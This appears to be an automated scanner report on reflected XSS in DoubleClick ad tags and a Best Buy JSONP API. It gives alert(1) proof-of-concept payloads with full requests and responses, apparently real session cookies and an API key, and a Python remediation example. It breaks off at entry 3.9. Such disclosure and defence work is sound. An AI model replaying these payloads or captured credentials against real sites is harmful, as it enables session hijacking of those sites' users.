User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/13222
21d5724794f
/cm.ver.adhd_search/slideshow/womensymptoms;ugc=n;c=slideshow;i=c5822;dcopt=ist;comp=;tile=1;sz=728x90;vp=a;search=n;ord=240008804:
Date: Mon, 18 Jul 2011 19:23:59 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3. Cross-site scripting (reflected)
There are 181 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences: input should be validated as strictly as possible on arrival, given the kind of content it is expected to contain, and user input should be encoded for the exact context into which it is written (HTML body, HTML attribute, JavaScript string, and so on) at the point where it is copied into the response, so that it cannot break out of that context. In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://ad.doubleclick.net/adj/cm.ver.adhd_search/slideshow/womensymptoms [hcpage2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.ver.adhd_search/slideshow/womensymptoms

Issue detail

The value of the hcpage2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8263a'%3balert(1)//e7aed1d2a92 was submitted in the hcpage2 parameter. This input was echoed as 8263a';alert(1)//e7aed1d2a92 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Note that this adj response is itself JavaScript (Content-Type: application/x-javascript, body built with document.write) and is consumed by publisher pages that include it via a <script> tag, so code injected through hcpage2 runs in the origin of whichever page embeds the tag with an attacker-influenced value. If the value must be echoed, it belongs in the single-quoted string only after JavaScript-string encoding, and, because that string is then written out as an HTML href attribute, after HTML-attribute encoding first.

Request

GET /adj/cm.ver.adhd_search/slideshow/womensymptoms;hcpage2=8263a'%3balert(1)//e7aed1d2a92 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 424
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 18 Jul 2011 19:24:06 GMT
Expires: Mon, 18 Jul 2011 19:24:06 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b48/0/0/%2a/o;231426503;0-0;0;65456586;3454-728/90;43051775/43069562/1;;~okv=;hcpage2=8263a';alert(1)//e7aed1d2a92;~aopt=2/0/ff/0;~sscs=%3fhttp://www.communityinvitations.com/html.pro?ID=1026&said=mc123&csid=hc11&pcid=HC">
...[SNIP]...

3.2. http://ad.doubleclick.net/adj/cm.ver.adhd_search/slideshow/womensymptoms [ugc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.ver.adhd_search/slideshow/womensymptoms

Issue detail

The value of the ugc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d5c6'%3balert(1)//015365853bb was submitted in the ugc parameter. This input was echoed as 7d5c6';alert(1)//015365853bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.ver.adhd_search/slideshow/womensymptoms;ugc=7d5c6'%3balert(1)//015365853bb HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 420
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 18 Jul 2011 19:23:37 GMT
Expires: Mon, 18 Jul 2011 19:23:37 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b48/0/0/%2a/o;231426503;0-0;0;65456586;3454-728/90;43051775/43069562/1;;~okv=;ugc=7d5c6';alert(1)//015365853bb;~aopt=2/0/ff/0;~sscs=%3fhttp://www.communityinvitations.com/html.pro?ID=1026&said=mc123&csid=hc11&pcid=HC">
...[SNIP]...

3.3. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))

Issue detail

The value of REST URL parameter 1 is copied into the "message" string of the JSON error object in the JSONP body. The payload 68799<script>alert(1)</script>a288158a184 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response: the angle brackets were not escaped. The response is served as Content-Type: application/x-javascript; charset=UTF-8 and the reflected tags sit inside a JSON string literal, where they are inert as JavaScript, so they render as HTML only where a browser disregards the declared content type (no X-Content-Type-Options: nosniff header is sent). The callback parameter on the same endpoint (3.5) reflects outside any string literal and is the more direct script-injection vector.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v168799<script>alert(1)</script>a288158a184/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?id=pcat17410&type=page&carrier_text=Verizon+Wireless&list=y&sc=mobilePlansSP&usc=pcmcat203600050025&documentType=popup&contract_Id=926&contract_text=New+2-yr.+contract&sku_id=2330093&lcn=Mobile+-+Mobile+Package&carrier_Id=929&add_to_pkg=true&removeLinkFacet=&contract_selected=New+2-yr.+contract&plan_type=I
Cookie: TLTSID=84D0DE5AB13D10B1A8788827D0E141DC; mobileab=b; newgroup3=b; newgroup2=b; newgroup=a; group2=a; group=c; DYN_USER_CONFIRM=1304deff50b793ec00235e3b0413fa91; DYN_USER_ID=ATG12562361841; JSESSIONID=389450CC5B435E7E6961192C7DB2C725.bbolsp-app05-28; TLTUID=84D0DE5AB13D10B1A8788827D0E141DC; fsr.a=1310993962201

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web1.ATL
Etag: "9741fe2131014677912d443f74a248fe"
X-Runtime: 2
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2390
Date: Mon, 18 Jul 2011 13:00:19 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
<YourApiKey> : All stores within 10 miles of the latitude 38.89 and longitude -77.03"
],
"code": 400,
"message": "Couldn't understand '/v168799<script>alert(1)</script>a288158a184/products(digitalSku>
...[SNIP]...

3.4. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))

Issue detail

The value of REST URL parameter 2 is copied into the "message" string of the JSON error object in the JSONP body, which is served as application/x-javascript. The payload e9d2b<script>alert(1)</script>67b415acb5b was submitted in the REST URL parameter 2. This input was echoed with its double quotes JSON-escaped (\") but the angle brackets left as is, so the tags survive intact in the response; inside a JSON string value they are inert as JavaScript and become markup only where a browser treats the response as HTML.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(digitalSku%3E%22%22e9d2b<script>alert(1)</script>67b415acb5b&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?id=pcat17410&type=page&carrier_text=Verizon+Wireless&list=y&sc=mobilePlansSP&usc=pcmcat203600050025&documentType=popup&contract_Id=926&contract_text=New+2-yr.+contract&sku_id=2330093&lcn=Mobile+-+Mobile+Package&carrier_Id=929&add_to_pkg=true&removeLinkFacet=&contract_selected=New+2-yr.+contract&plan_type=I
Cookie: TLTSID=84D0DE5AB13D10B1A8788827D0E141DC; mobileab=b; newgroup3=b; newgroup2=b; newgroup=a; group2=a; group=c; DYN_USER_CONFIRM=1304deff50b793ec00235e3b0413fa91; DYN_USER_ID=ATG12562361841; JSESSIONID=389450CC5B435E7E6961192C7DB2C725.bbolsp-app05-28; TLTUID=84D0DE5AB13D10B1A8788827D0E141DC; fsr.a=1310993962201

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web2.ATL
Etag: "4c75cf3cf3252688f340f0f4ea802c35"
X-Runtime: 2
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2390
Date: Mon, 18 Jul 2011 13:00:21 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
<YourApiKey> : All stores within 10 miles of the latitude 38.89 and longitude -77.03"
],
"code": 400,
"message": "Couldn't understand '/v1/products(digitalSku>\"\"e9d2b<script>alert(1)</script>67b415acb5b&sku in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json'",
"status": "400 Bad Request"
}

...[SNIP]...

3.5. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))

Issue detail

The value of the callback request parameter is copied into the JSONP response as the name of the function that wraps the JSON object, a JavaScript context outside any string literal. The payload 15b9d<script>alert(1)</script>ccb5f2f0c81 was submitted in the callback parameter. This input was echoed unmodified in the application's response. Because JSONP is consumed by loading the endpoint as a script, whatever is supplied here is parsed as JavaScript in the origin of the consuming page; the callback value should be restricted to a short identifier pattern rather than reflected verbatim.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC15b9d<script>alert(1)</script>ccb5f2f0c81&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?id=pcat17410&type=page&carrier_text=Verizon+Wireless&list=y&sc=mobilePlansSP&usc=pcmcat203600050025&documentType=popup&contract_Id=926&contract_text=New+2-yr.+contract&sku_id=2330093&lcn=Mobile+-+Mobile+Package&carrier_Id=929&add_to_pkg=true&removeLinkFacet=&contract_selected=New+2-yr.+contract&plan_type=I
Cookie: TLTSID=84D0DE5AB13D10B1A8788827D0E141DC; mobileab=b; newgroup3=b; newgroup2=b; newgroup=a; group2=a; group=c; DYN_USER_CONFIRM=1304deff50b793ec00235e3b0413fa91; DYN_USER_ID=ATG12562361841; JSESSIONID=389450CC5B435E7E6961192C7DB2C725.bbolsp-app05-28; TLTUID=84D0DE5AB13D10B1A8788827D0E141DC; fsr.a=1310993962201

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web1.ATL
Etag: "226ca56fdabe2e825c5d252ee6a45428"
X-Runtime: 27
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 405
Date: Mon, 18 Jul 2011 13:00:10 GMT

SDSTATIC15b9d<script>alert(1)</script>ccb5f2f0c81({
"queryTime": "0.006",
"currentPage": 1,
"totalPages": 0,
"partial": false,
"from": 1,
"total": 0,
"to": 0,
"products": [

],
"canonicalUrl": "/v1/products(digitalSku>
...[SNIP]...
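The script contexts seen on this page need different defences: a value written into a single-quoted JavaScript string inside document.write (3.1 and 3.2), a JSONP callback name (3.5), and a JSON string that carries reflected tags (3.3 and 3.4). The Python below is an added example, not code from this report or from either site's operator. It encodes a value for the JS-string-inside-HTML-attribute context of the adj response, allow-lists the callback name, and emits JSON that stays inert even if a browser sniffs the body as HTML, with the headers that should accompany it. The function names, the regular expression and the header values are this example's own choices; the sample payloads are the ones recorded in instances 3.1 and 3.5 above.

```python
import html
import json
import re

# A JSONP callback must be a plain identifier path such as "SDSTATIC" or
# "app.onData"; anything else (quotes, angle brackets, parentheses) is rejected.
_CALLBACK_RE = re.compile(r"\A[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*\Z")


def validate_callback(name: str) -> str:
    """Return the callback name unchanged if it is a safe identifier, else raise."""
    if len(name) > 64 or not _CALLBACK_RE.match(name):
        raise ValueError(f"rejected callback name: {name!r}")
    return name


def js_single_quoted(value: str) -> str:
    """Encode a value for placement inside a single-quoted JavaScript string.

    Quotes, the backslash, angle brackets, ampersand, control characters and the
    two Unicode line terminators are written as \\uXXXX escapes, so the value can
    neither close the literal (the 8263a';alert(1)// pattern) nor, once the string
    is written to the document, introduce new tags.
    """
    out = []
    for ch in value:
        code = ord(ch)
        if ch in "\\'\"<>&\u2028\u2029" or code < 0x20:
            out.append(f"\\u{code:04x}")
        else:
            out.append(ch)
    return "".join(out)


def ad_tag_anchor(key: str, value: str) -> str:
    """Rebuild the document.write('<a ... href="...;key=value">') line from the
    adj response with the key-value encoded for where it lands.

    The value passes through two parsers in order: the JavaScript engine decodes
    the string literal, then document.write hands the result to the HTML parser
    as an attribute value. Encoding is applied in reverse order: HTML-attribute
    escaping first, JavaScript-string escaping second.
    """
    attr_safe = html.escape(value, quote=True)
    href = f"http://ad.doubleclick.net/click;~okv=;{key}={js_single_quoted(attr_safe)}"
    return f"document.write('<a target=\"_new\" href=\"{href}\">');"


def jsonp_response(callback: str, payload: dict) -> str:
    """Wrap payload in a validated callback. Inside the JSON, < > & are written
    as \\u escapes: JavaScript reads them identically, but an HTML parser never
    sees markup, so a reflected <script> in an error message stays inert even
    if the browser ignores the declared content type."""
    body = json.dumps(payload, ensure_ascii=True)
    body = body.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")
    return f"{validate_callback(callback)}({body});"


def jsonp_headers() -> dict:
    """Headers to send with jsonp_response: the script content type plus
    nosniff, so browsers do not reinterpret the body as HTML."""
    return {
        "Content-Type": "application/javascript; charset=UTF-8",
        "X-Content-Type-Options": "nosniff",
    }


if __name__ == "__main__":
    print(ad_tag_anchor("hcpage2", "8263a';alert(1)//e7aed1d2a92"))
    print(jsonp_response("SDSTATIC", {"message": "Couldn't understand '/v168799<script>alert(1)</script>a288158a184'"}))
    try:
        validate_callback("SDSTATIC15b9d<script>alert(1)</script>ccb5f2f0c81")
    except ValueError as exc:
        print(exc)
```

The order of the two encodings in ad_tag_anchor is the point most often got wrong: JS-escaping alone would leave a decoded double quote free to end the href attribute once document.write runs. For the JSONP endpoint, the allow-list on the callback closes the only context where reflected input is evaluated rather than merely stored, and the \u-escaping plus nosniff removes the residual risk from the error-message reflections.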

3.6. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))

Issue detail

The name of an arbitrarily supplied request parameter is copied into the "message" string of the JSON error object in the JSONP body, which is served as application/x-javascript. The payload d7646<script>alert(1)</script>868fac7865c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response; inside the JSON string the tags are inert as JavaScript and become markup only where a browser treats the response as HTML.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json&d7646<script>alert(1)</script>868fac7865c=1 HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?id=pcat17410&type=page&carrier_text=Verizon+Wireless&list=y&sc=mobilePlansSP&usc=pcmcat203600050025&documentType=popup&contract_Id=926&contract_text=New+2-yr.+contract&sku_id=2330093&lcn=Mobile+-+Mobile+Package&carrier_Id=929&add_to_pkg=true&removeLinkFacet=&contract_selected=New+2-yr.+contract&plan_type=I
Cookie: TLTSID=84D0DE5AB13D10B1A8788827D0E141DC; mobileab=b; newgroup3=b; newgroup2=b; newgroup=a; group2=a; group=c; DYN_USER_CONFIRM=1304deff50b793ec00235e3b0413fa91; DYN_USER_ID=ATG12562361841; JSESSIONID=389450CC5B435E7E6961192C7DB2C725.bbolsp-app05-28; TLTUID=84D0DE5AB13D10B1A8788827D0E141DC; fsr.a=1310993962201

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web1.ATL
Etag: "6a55e83eb495dc72dbe3a94b0f38a975"
X-Runtime: 3
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2393
Date: Mon, 18 Jul 2011 13:00:16 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
nderstand '/v1/products(digitalSku>\"\"&sku in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json&d7646<script>alert(1)</script>868fac7865c=1'",
"status": "400 Bad Request"
}
})

3.7. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [pageSize parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))

Issue detail

The value of the pageSize request parameter is copied into the "message" string of the JSON error object in the JSONP body, which is served as application/x-javascript. The payload d6c6e<script>alert(1)</script>eeac2f6fc7c was submitted in the pageSize parameter. This input was echoed unmodified in the application's response; inside the JSON string the tags are inert as JavaScript and become markup only where a browser treats the response as HTML.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99d6c6e<script>alert(1)</script>eeac2f6fc7c&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?id=pcat17410&type=page&carrier_text=Verizon+Wireless&list=y&sc=mobilePlansSP&usc=pcmcat203600050025&documentType=popup&contract_Id=926&contract_text=New+2-yr.+contract&sku_id=2330093&lcn=Mobile+-+Mobile+Package&carrier_Id=929&add_to_pkg=true&removeLinkFacet=&contract_selected=New+2-yr.+contract&plan_type=I
Cookie: TLTSID=84D0DE5AB13D10B1A8788827D0E141DC; mobileab=b; newgroup3=b; newgroup2=b; newgroup=a; group2=a; group=c; DYN_USER_CONFIRM=1304deff50b793ec00235e3b0413fa91; DYN_USER_ID=ATG12562361841; JSESSIONID=389450CC5B435E7E6961192C7DB2C725.bbolsp-app05-28; TLTUID=84D0DE5AB13D10B1A8788827D0E141DC; fsr.a=1310993962201

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web2.ATL
Etag: "a8b3c56b89f2fc21f325c2ff8d8b0f10"
X-Runtime: 3
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2390
Date: Mon, 18 Jul 2011 13:00:12 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
: "Couldn't understand '/v1/products(digitalSku>\"\"&sku in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99d6c6e<script>alert(1)</script>eeac2f6fc7c&format=json'",
"status": "400 Bad Request"
}
})

3.8. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [show parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))

Issue detail

The value of the show request parameter is copied into the HTML document as plain text between tags. The payload 1a141<script>alert(1)</script>c2cb467df93 was submitted in the show parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku1a141<script>alert(1)</script>c2cb467df93&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?id=pcat17410&type=page&carrier_text=Verizon+Wireless&list=y&sc=mobilePlansSP&usc=pcmcat203600050025&documentType=popup&contract_Id=926&contract_text=New+2-yr.+contract&sku_id=2330093&lcn=Mobile+-+Mobile+Package&carrier_Id=929&add_to_pkg=true&removeLinkFacet=&contract_selected=New+2-yr.+contract&plan_type=I
Cookie: TLTSID=84D0DE5AB13D10B1A8788827D0E141DC; mobileab=b; newgroup3=b; newgroup2=b; newgroup=a; group2=a; group=c; DYN_USER_CONFIRM=1304deff50b793ec00235e3b0413fa91; DYN_USER_ID=ATG12562361841; JSESSIONID=389450CC5B435E7E6961192C7DB2C725.bbolsp-app05-28; TLTUID=84D0DE5AB13D10B1A8788827D0E141DC; fsr.a=1310993962201

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web1.ATL
Etag: "ee7d295a422b247c30a90d8b7ae9e988"
X-Runtime: 3
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2390
Date: Mon, 18 Jul 2011 13:00:07 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
89 and longitude -77.03"
],
"code": 400,
"message": "Couldn't understand '/v1/products(digitalSku>\"\"&sku in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku1a141<script>alert(1)</script>c2cb467df93&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json'",
"status": "400 Bad Request"
}
})

3.9. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

